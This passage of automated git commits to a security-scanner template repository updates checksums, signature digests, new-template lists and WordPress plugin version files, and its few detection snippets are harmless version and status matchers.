javascript/misconfiguration/ssh/ssh-weakkey-exchange-algo.yaml:6749f7256d5cdb6171b77be90c144d7947efcc27 -javascript/misconfiguration/x11/x11-unauth-access.yaml:d1b21a89308ab060b98e68f915d02ab1b1a17de0 +javascript/misconfiguration/x11/x11-unauth-access.yaml:5203d11d0a980db3b9320e60273c35cbe459fdec javascript/udp/detection/tftp-detect.yaml:983f405d3c4b95ad9114371625cab9cdf8e28032 network/backdoor/backdoored-zte.yaml:1dedf67f253983bbc4882b7616078c5a53cbe350 network/c2/7777botnet.yaml:35a2e313d6ac2cc06e061282308083ad0e3c9964 @@ -8953,7 +8953,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:bab688b9113d21c436462a88055b93aae6ef6616 +templates-checksum.txt:bcbec0a1d544044beb40419696a6d0dceb1dcf79 vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From 4227f2f4bf6a71776be72dee4f6c94e7f9f84ac6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Aug 2024 12:10:58 +0000 Subject: [PATCH 1828/1841] Auto Template Signing [Thu Aug 1 12:10:58 UTC 2024] :robot: --- http/cves/2024/CVE-2024-20767.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-20767.yaml b/http/cves/2024/CVE-2024-20767.yaml index 22dc41dc11..045458e095 100644 --- a/http/cves/2024/CVE-2024-20767.yaml +++ b/http/cves/2024/CVE-2024-20767.yaml @@ -53,4 +53,4 @@ http: regex: - "(.*)" internal: true -# digest: 4a0a00473045022100e6a9a13cc692e12629ce4b557e8a9cdaab2f6b3df9155e2bb4f5cac00241469b0220351a6751dda75fd857b8ac90f6cdca44f5853c3c3019070572245e97c7aec3eb:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220203c669fae6e243c8b45e754f6caba7ed4706fef525376c00d09efea9698b787022100ada2f1608d93dcf71799ce34f986e34f83dcd70a2d7ffa05f89dbec7fd0f7b0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 9960cdcef584c72c6387522730bd3ad64c346052 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 1 Aug 2024 13:42:32 +0000 Subject: [PATCH 1829/1841] Auto Generated New Template Addition List [Thu Aug 1 13:42:32 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index bd1edb6c27..1cbdbe1270 100644 --- a/.new-additions +++ b/.new-additions @@ -6,6 +6,7 @@ http/cves/2024/CVE-2024-24763.yaml http/cves/2024/CVE-2024-34061.yaml http/cves/2024/CVE-2024-39903.yaml http/cves/2024/CVE-2024-39907.yaml +http/cves/2024/CVE-2024-41107.yaml http/cves/2024/CVE-2024-6205.yaml http/cves/2024/CVE-2024-6366.yaml http/cves/2024/CVE-2024-6396.yaml From 9efec7af283b6d81f9c29bd344a0b1322807b9f6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Aug 2024 13:42:40 +0000 Subject: [PATCH 1830/1841] Auto Generated Templates Checksum [Thu Aug 1 13:42:40 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 694371a8e4..319ff80c78 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3415,7 +3415,7 @@ http/cves/2024/CVE-2024-1561.yaml:c0921ab0f4b853a4556d2853856c4ce3dae6dd3b http/cves/2024/CVE-2024-1698.yaml:86f5580473ce4a829a4279af9ad763b52bfd4983 http/cves/2024/CVE-2024-1709.yaml:fbffa10f3832defdae69499878e00010a44c1b0a http/cves/2024/CVE-2024-1728.yaml:53f4b2e0ca6437434e903db273382fb8d009fd46 -http/cves/2024/CVE-2024-20767.yaml:3663dac621362623cf14b14e7850e6578eaea382 +http/cves/2024/CVE-2024-20767.yaml:57d63c3873c8984ab2dd7be15439fa7825605956 http/cves/2024/CVE-2024-21644.yaml:48021ee39de24e3ea1ef7e900a5a28ebed70f411 http/cves/2024/CVE-2024-21645.yaml:0b8856904f2d109744123490861e51f34afcff6b http/cves/2024/CVE-2024-21650.yaml:4f0a59b8d224262e95327dd4ed30d02741831108 @@ -3515,6 +3515,7 @@ http/cves/2024/CVE-2024-39907.yaml:451e6402d65c267c32597f47c71b31f70efe48c5 http/cves/2024/CVE-2024-39914.yaml:2c8d9d4637d5806823bcba86390d8646d1db66bf http/cves/2024/CVE-2024-40348.yaml:e1b3c7bd1bfe293d155f1999f412eee670c8334b http/cves/2024/CVE-2024-4040.yaml:87622a19f81053e7b7bfdf1fdce706db759cc310 +http/cves/2024/CVE-2024-41107.yaml:0671aa1827fbb830e71628760ec5e81a3939626c http/cves/2024/CVE-2024-4257.yaml:76768a186c284a20129bc8f67a2c620f8c1fc7ac http/cves/2024/CVE-2024-4295.yaml:7c3e58627bc8d2cfbeba41d4e5b02805b06aac35 http/cves/2024/CVE-2024-4348.yaml:4b01ceded94fa6f15d3037f21c83953c37fef181 @@ -8953,7 +8954,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:bcbec0a1d544044beb40419696a6d0dceb1dcf79 +templates-checksum.txt:fe8931b544a439887a880df5006d2869deab64e6 vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From 0610a9f745cff0944b445f75af4610ba7dae09da Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 1 Aug 2024 13:43:27 +0000 Subject: [PATCH 1831/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index a1cada6964..5bc7b67191 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -11,6 +11,7 @@ on: - 'http/cves/2024/CVE-2024-34061.yaml' - 'http/cves/2024/CVE-2024-39903.yaml' - 'http/cves/2024/CVE-2024-39907.yaml' + - 'http/cves/2024/CVE-2024-41107.yaml' - 'http/cves/2024/CVE-2024-6205.yaml' - 'http/cves/2024/CVE-2024-6366.yaml' - 'http/cves/2024/CVE-2024-6396.yaml' From 0289f57f6019e603ba7baf8805a149ff0c58cab1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Aug 2024 13:44:26 +0000 Subject: [PATCH 1832/1841] Auto Template Signing [Thu Aug 1 13:44:26 UTC 2024] :robot: --- http/cves/2024/CVE-2024-41107.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-41107.yaml b/http/cves/2024/CVE-2024-41107.yaml index 92f9fc4404..f4a9def750 100644 --- a/http/cves/2024/CVE-2024-41107.yaml +++ b/http/cves/2024/CVE-2024-41107.yaml @@ -44,3 +44,4 @@ http: - "contains(content_type,'text/xml')" - "status_code==302" condition: and +# digest: 4a0a00473045022100bba4f9d8bd13d7f88a72d393233b2bf209b17e02fb2ecad69d9fba3e6177cb180220391703c38491fdb8803df18e2a2e06720d705bdaf7323909112ca37e6360ef73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From d1af5887775cd1edc9764d63bd2556749fea0b1e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 2 Aug 2024 00:19:50 +0000 Subject: [PATCH 1833/1841] Auto WordPress Plugins Update [Fri Aug 2 00:19:50 UTC 2024] :robot: --- helpers/wordpress/plugins/advanced-custom-fields.txt | 2 +- helpers/wordpress/plugins/all-in-one-seo-pack.txt | 2 +- helpers/wordpress/plugins/easy-wp-smtp.txt | 2 +- helpers/wordpress/plugins/envato-elements.txt | 2 +- helpers/wordpress/plugins/nextend-facebook-connect.txt | 2 +- helpers/wordpress/plugins/sg-cachepress.txt | 2 +- helpers/wordpress/plugins/sg-security.txt | 2 +- helpers/wordpress/plugins/svg-support.txt | 2 +- helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - .../technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - http/technologies/wordpress/plugins/chaty.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - .../technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 3 +-- http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluent-smtp.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - .../technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - .../technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/hostinger.yaml | 1 - http/technologies/wordpress/plugins/image-optimization.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/metform.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - .../technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/svg-support.yaml | 1 - .../technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/templately.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - .../technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 3 +-- .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-crontrol.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-seopress.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 209 files changed, 11 insertions(+), 211 deletions(-) diff --git a/helpers/wordpress/plugins/advanced-custom-fields.txt b/helpers/wordpress/plugins/advanced-custom-fields.txt index 9152abbe6c..2319a69f28 100644 --- a/helpers/wordpress/plugins/advanced-custom-fields.txt +++ b/helpers/wordpress/plugins/advanced-custom-fields.txt @@ -1 +1 @@ -6.3.4 \ No newline at end of file +6.3.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/all-in-one-seo-pack.txt b/helpers/wordpress/plugins/all-in-one-seo-pack.txt index 5262914a71..63c2883247 100644 --- a/helpers/wordpress/plugins/all-in-one-seo-pack.txt +++ b/helpers/wordpress/plugins/all-in-one-seo-pack.txt @@ -1 +1 @@ -4.6.7.1 \ No newline at end of file +4.6.8.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/easy-wp-smtp.txt b/helpers/wordpress/plugins/easy-wp-smtp.txt index e7034819f6..9183195ace 100644 --- a/helpers/wordpress/plugins/easy-wp-smtp.txt +++ b/helpers/wordpress/plugins/easy-wp-smtp.txt @@ -1 +1 @@ -2.3.2 \ No newline at end of file +2.4.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/envato-elements.txt b/helpers/wordpress/plugins/envato-elements.txt index 476ede462b..5ad8f21ac9 100644 --- a/helpers/wordpress/plugins/envato-elements.txt +++ b/helpers/wordpress/plugins/envato-elements.txt @@ -1 +1 @@ -2.0.13 \ No newline at end of file +2.0.14 \ No newline at end of file diff --git a/helpers/wordpress/plugins/nextend-facebook-connect.txt b/helpers/wordpress/plugins/nextend-facebook-connect.txt index 85b3175412..d96f69cdd5 100644 --- a/helpers/wordpress/plugins/nextend-facebook-connect.txt +++ b/helpers/wordpress/plugins/nextend-facebook-connect.txt @@ -1 +1 @@ -3.1.13 \ No newline at end of file +3.1.14 \ No newline at end of file diff --git a/helpers/wordpress/plugins/sg-cachepress.txt b/helpers/wordpress/plugins/sg-cachepress.txt index 6e218b78e5..43bcddeda0 100644 --- a/helpers/wordpress/plugins/sg-cachepress.txt +++ b/helpers/wordpress/plugins/sg-cachepress.txt @@ -1 +1 @@ -7.6.2 \ No newline at end of file +7.6.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/sg-security.txt b/helpers/wordpress/plugins/sg-security.txt index 8e03717dca..a73b432544 100644 --- a/helpers/wordpress/plugins/sg-security.txt +++ b/helpers/wordpress/plugins/sg-security.txt @@ -1 +1 @@ -1.5.1 \ No newline at end of file +1.5.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/svg-support.txt b/helpers/wordpress/plugins/svg-support.txt index 160fe391c8..1b03fe63dd 100644 --- a/helpers/wordpress/plugins/svg-support.txt +++ b/helpers/wordpress/plugins/svg-support.txt @@ -1 +1 @@ -2.5.5 \ No newline at end of file +2.5.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt b/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt index 2ad1684ea1..c910885a00 100644 --- a/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt +++ b/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt @@ -1 +1 @@ -2.14.1 \ No newline at end of file +2.15.0 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 50b5926d79..3fd2256749 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bb21c1a47541da16e8bda0d6b7655bac6e4c0501f14293739586047952f741cb0221008e68d88a15b4ea97a4744ffe7ef8235a34b0f2a3e08df42d3e886a9030ee1a59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index e9441db46a..6a0d344b63 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a96ab15ddb89d8065dbf2aaaab430e20d82439033be26c342aaa13ab6b30485d022100d2bebd77742fa09a8178c6ea4cb0434ae71bdd06dbb16aa64844ed35d5909f3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index edbdb7eb55..6fb5080bc8 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f666e6fd4c4a8dc99c92bda47f10e36a8558d666e8eb895a83e1636f89a6a87602200ed373b3a15fe11b1b58d67abaa577d8f8d2f76ed38931c60ea172cc708af9ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 444d98e59c..cddbb4bb2e 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022015e0aa337a86699ec98fe00b80b4f3f2f53e8f5a5a86dc2221c348e4f3037db40221008cea985c8f92186bcbf6605558c8fdb9200d9426692101f40ae95ef239c4722b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 292c97c440..6f253f9f55 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220554eff996af197cd8fbfd6eeefb3959e5dffb907a99939dda5ee543908619b51022024e9187952242074e1cf7995bade104c2496b7cf711f118003a04fd33b349692:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 5ff3801337..fe45de4d04 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e044b71e883a3edb2bc724d1c8d2a269d27475c212d844d67fb85a82eb03ba1c022100e2cd7e62585b6363649103f00656850fb4b03a709c07a41a47bd2995787ba4d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 32c05e8835..69e425f446 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022069ffa28f501d1c8c8bc5c2b0ffca5f5712212f3038cd905e9ef62ec94cd792fe02203d6333298e0a1bca424dfb676ea314fb79747549696d2382fd7df8dae793da16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 79ffff7131..9c07c65e4e 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201888151a74948f6f450782d958e7c94aa6fdbd464334df3f38556d6a0c0493d202207340a2f97036e32848bcd2d158b9ab58e451b9bdbc9e99091a6b1393ab29bd9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index bfc5b23669..92c8f5656e 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ 